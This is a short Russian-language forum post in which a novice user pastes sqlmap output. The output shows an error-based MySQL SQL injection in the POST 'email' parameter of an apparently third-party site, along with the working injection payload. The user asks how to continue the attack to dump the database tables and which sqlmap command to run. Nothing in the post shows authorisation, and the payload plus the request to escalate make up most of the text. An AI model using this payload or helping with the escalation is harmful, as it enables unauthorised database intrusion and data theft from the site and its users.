
05.03.2016, 04:15
|
|
Новичок
Регистрация: 23.07.2009
Сообщений: 25
С нами:
8843221
Репутация:
0
|
|
После скана сайта на уязвимость, выдало такую инфу.
Код:
sqlmap identified the following injection point(s) with a total of 275 HTTP(s) requests:
---
Parameter: email (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: mailFlag=newsletter&email=QWln' AND (SELECT 5736 FROM(SELECT COUNT(*),CONCAT(0x716a717a71,(SELECT (ELT(5736=5736,1))),0x71717a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Jdzw'='Jdzw
---
web application technology: PHP 5.3.29
back-end DBMS: MySQL 5.0
и в target.txt такое
Код:
https://www.site.com/index.php?option=sentMail (POST)
mailFlag=newsletter&email=QWln
Как дальше раскручивать чтобы получить таблицы ? Интересует сам запрос sqlmap.py -u "" и что указывать.
|
|
|